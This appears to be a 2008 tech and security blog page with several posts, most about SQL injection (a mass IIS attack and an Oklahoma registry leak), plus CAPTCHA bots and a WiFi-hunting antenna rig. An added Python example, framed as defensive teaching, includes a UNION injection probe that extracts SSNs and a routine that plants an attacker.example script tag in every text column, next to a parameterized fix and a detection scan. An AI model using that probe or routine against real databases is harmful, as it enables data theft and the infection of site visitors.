Your security, networking, programming, and application news source.

Monday, April 28, 2008

Automated SQL Injection Mass Attack Hits IIS Websites

“Exploits of a Mom” by <xkcd>

  An automated attack against websites running on Microsoft IIS has hit some 500,000 sites. Those affected include the United Nations, UK Government sites and the U.S. Department of Homeland Security.

  The attack targets IIS servers running ASP applications that pass unsanitized request parameters straight into SQL queries. The injected SQL is written generically against the database's own system tables rather than against named application tables, so it can pollute the database without any prior knowledge of its table and field structure.

  The injected payload appends a snippet of HTML/JavaScript to every text field in the database. Whenever a page renders one of those fields, the visitor's browser loads an external script from the attacker's server that attempts to compromise the visitor's PC. Because the payload lives in the data rather than in the page templates, cleanup means removing it from every affected row and fixing the injection point; otherwise the next pass of the attack script simply re-infects the site. So far there have been no details about who is behind the attacks.

<Wired Blog - Massive Attack: Half A Million Microsoft-Powered Sites Hit With SQL Injection> (4/28/2008)
<Hackademix - Mass Attack FAQ> (4/26/2008)

Saturday, April 26, 2008

When Logo Design Goes Wrong

  The Office of Government Commerce, an office of the Treasury in the United Kingdom, is commonly known as the OGC. An investment of £14,000 went into a logo design, which resulted in a nice formal rendering of the OGC acronym.

According to insiders, within seconds of the unveiling employees spotted the problem with this proud logo, despite it already having been printed on mouse pads and pens. If you turn it on its side, you should notice the problem.

<A hilarious animated version (gif) was posted here>

<The UK Telegraph - OGC unveils new logo to red faces> (4/25/2008)

Saturday, April 19, 2008

Microsoft Works SE (Sponsored Edition) Marketing Trials

  Microsoft is quietly trying its hand at ad-funded software with Microsoft Works SE (Sponsored Edition). The trials are being kept secret, but the United States, France, Canada, Poland and the United Kingdom are said to be involved. It is available only through select computer makers, and Microsoft won't say which. Some searching has shown <Sony offering it in the U.S.> and <Packard Bell offering it in the U.K.>, both bundled with notebooks.

Microsoft Vice President Chris Capossela, on this and some subscription-based announcements: "These are all experiments."

Read more at:
<CNET News - Microsoft quietly offering ad-funded Works> April 18, 2008

Friday, April 18, 2008

Microsoft Vista Users: Bend Over

  Didn't listen to all those Vista bashers? Chances are you're already kicking yourself over the issues you're having with Vista. Since you're all waiting for some reassuring words from Microsoft, here they are.
  Last Thursday, at an annual Seattle event, Microsoft CEO Steve Ballmer called the Vista OS "a work in progress"! I hope they warned you about this when you dropped $200-300 or more on a copy.

You could petition:
<Info World's Save XP Petition>

You could jump on the Linux bandwagon:

Or you could keep your hopes up waiting for the next Windows:
<Windows 7 (Wikipedia)>

Anyone think a Mac is an option? (comments are wide open, as always)

Thursday, April 17, 2008

The WIFI Predator [DIYS]

  A do-it-yourself high-powered antenna paired with custom router firmware that actively searches out open wireless connections.

Assembly Instructions:

<The Wifi Predator> - 4 Step Assembly Instructions at (April 14 2008)

Hardware List:

  • Buffalo WHR-HP-G54

  • HyperLink 2.4GHz 14.5 Yagi Antenna

  • Reverse Polarity SMA Male to Male N-type adapter.

  • Sears’s Ultra-Cheap camera tripod

Software/Firmware List:

  • <DD-WRT firmware>, a third-party firmware derived from the original Linksys firmware

  • <AutoAP add-on> for DD-WRT, which makes the router continuously scan for and connect to open wireless networks.

Quantum Computing Creation

<Prem Kumar>, a professor of electrical engineering and computer science at Northwestern University, and his team have shown that they can build a quantum NOT gate inside an optical fiber. Quantum logic gates using laser beams passing through free space have been built before; because this gate sits within fiber, it could become part of a circuit that relays quantum information securely over hundreds of kilometers of fiber. Such a gate is one of the building blocks needed for a <quantum computer>.

<Technology Review - Toward Quantum Internet> Published by MIT (Tuesday, April 15, 2008).

Tuesday, April 15, 2008

Hotmail CAPTCHA Massacre

<Recent reports> describe streamlined bot attacks on the Windows Live CAPTCHA that are slamming Hotmail. <New reports> show the process in action, with a purported success rate of one in 8 to 10 attempts (roughly 10 to 12.5%). One bot can <reportedly> create at least 1,440 accounts a day, one per minute; these accounts are then used for mass spamming.

SQL Exploit by Recent Example

  Oklahoma set up a <sex offender and violent offender site>. Right off the bat you can see the site is still carelessly managed: on the front page the 'Notice to public:' heading has a broken non-breaking-space HTML entity hanging out.
  Apparently, until several people stressed the problem and its severity, the site embedded raw SQL queries in its web requests and executed whatever query came back, with no validation at all. That let anyone who could edit a URL and knew a little SQL retrieve Social Security numbers and other personal information on the tens of thousands of people in this registry. The fix is not to "sanitize" the incoming SQL but to stop accepting SQL from the client entirely: keep the queries server-side and pass only bound values.

<The Daily WTF>
(contains some examples as well as details)

Find sites with similarly poor design with a crafted Google search:
<Google Search Example>
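A worked illustration of this post and of the mass IIS attack above, as an added example that is not code from the original page, the Oklahoma site or the mass-attack payload. It shows a handler that concatenates request input into SQL beside its parameterized fix, the "every text column" pollution the mass attack performed, and the schema-wide scan a defender can run afterwards. It uses Python's built-in sqlite3 with constructed sample rows; the names, SSNs and attacker host are made up, and SQLite's catalog (sqlite_master, PRAGMA table_info) stands in for the database's own system tables that a schema-agnostic payload reads.

```python
# Added example, not code from the original post, the Oklahoma site or the
# mass-attack payload: a handler that concatenates request input into SQL
# beside its parameterized fix, the "every text column" pollution the mass
# attack performed, and a schema-wide scan a defender can run afterwards.
# Everything runs against an in-memory SQLite database with constructed
# sample rows (names, SSNs and the attacker host are all made up).
import sqlite3

# Placeholder for the attacker-hosted script the real payload referenced.
SCRIPT_TAG = '<script src="http://attacker.example/x.js"></script>'


def build_db():
    """Constructed sample schema: a registry table and a news table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE offenders (id INTEGER PRIMARY KEY, name TEXT,
                                ssn TEXT, county TEXT);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO offenders VALUES (1, 'John Doe', '123-45-6789', 'Tulsa');
        INSERT INTO offenders VALUES (2, 'Jane Roe', '987-65-4321', 'Cleveland');
        INSERT INTO news VALUES (1, 'Notice to public', 'Registry updated weekly');
    """)
    return conn


def search_vulnerable(conn, county):
    """The bug: a request parameter concatenated straight into the query."""
    sql = "SELECT name, county FROM offenders WHERE county = '" + county + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, county):
    """The fix: the driver binds the value, so it can never become SQL syntax."""
    sql = "SELECT name, county FROM offenders WHERE county = ?"
    return conn.execute(sql, (county,)).fetchall()


def text_columns(conn):
    """Enumerate every text-typed column from the database's own catalog,
    with no prior knowledge of the schema. SQLite's sqlite_master and
    PRAGMA table_info stand in for the system tables a schema-agnostic
    payload would consult on a different database engine."""
    cols = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    for (table,) in tables:
        for row in conn.execute(f'PRAGMA table_info("{table}")'):
            # row = (cid, name, declared_type, notnull, default, pk)
            if row[2].upper() in ("TEXT", "VARCHAR", "NVARCHAR", "NTEXT"):
                cols.append((table, row[1]))
    return cols


def pollute_every_text_column(conn, payload):
    """What the mass attack did to its victims: append the script tag to
    every text column of every table. Returns how many columns were hit."""
    cols = text_columns(conn)
    for table, col in cols:
        conn.execute(f'UPDATE "{table}" SET "{col}" = "{col}" || ?', (payload,))
    conn.commit()
    return len(cols)


def scan_for_script(conn, marker="<script"):
    """Defender's check: which text columns contain a script tag, and in
    how many rows. Returns sorted (table, column, rows_hit) triples."""
    hits = []
    for table, col in text_columns(conn):
        n = conn.execute(
            f'SELECT COUNT(*) FROM "{table}" WHERE instr("{col}", ?) > 0',
            (marker,)).fetchone()[0]
        if n:
            hits.append((table, col, n))
    return sorted(hits)


def demo():
    """Run the whole scenario and return the results for inspection."""
    db = build_db()
    # A classic UNION probe typed into the 'county' parameter.
    probe = "x' UNION SELECT name, ssn FROM offenders --"
    results = {
        "leak": sorted(search_vulnerable(db, probe)),   # SSNs come back
        "safe": search_parameterized(db, probe),        # nothing matches
        "before": scan_for_script(db),                  # clean database
        "touched": pollute_every_text_column(db, SCRIPT_TAG),
    }
    results["after"] = scan_for_script(db)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it and compare "leak" with "safe": the same probe string that pulls SSNs through the concatenated query returns nothing once the value is bound. The scan is the piece worth keeping; after an incident like the one above, run it over a copy of the production database rather than grepping page templates, since the tags live in the rows.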

Tuesday, April 8, 2008

XSS (Cross-Site Scripting) Explained

I've read about cross-site scripting techniques for years, but when I ran across an IBM article about XSS posted on <tweako>, it stood out as a great explanation.

<IBM Rational AppScan: Cross-site scripting explained>